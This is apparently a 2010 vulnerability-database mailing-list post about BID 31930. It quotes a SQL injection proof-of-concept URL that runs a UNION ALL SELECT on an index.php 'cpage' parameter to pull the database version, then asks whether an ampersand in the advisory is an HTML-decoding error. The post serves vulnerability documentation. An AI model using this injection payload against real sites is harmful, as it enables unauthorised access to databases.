[VIM] BID 31930 exploit

security curmudgeon jericho at attrition.org
Thu Nov 18 04:10:36 CST 2010



http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL 
SELECT 0,0,0,0,0,version()--


Just want to confirm, it appears the "&" is actually some HTML 
decoding snafu that is essentially doing & and an encoded &? Seems like 
that should be "&nid=" in the first example and "&cpage" in the second?

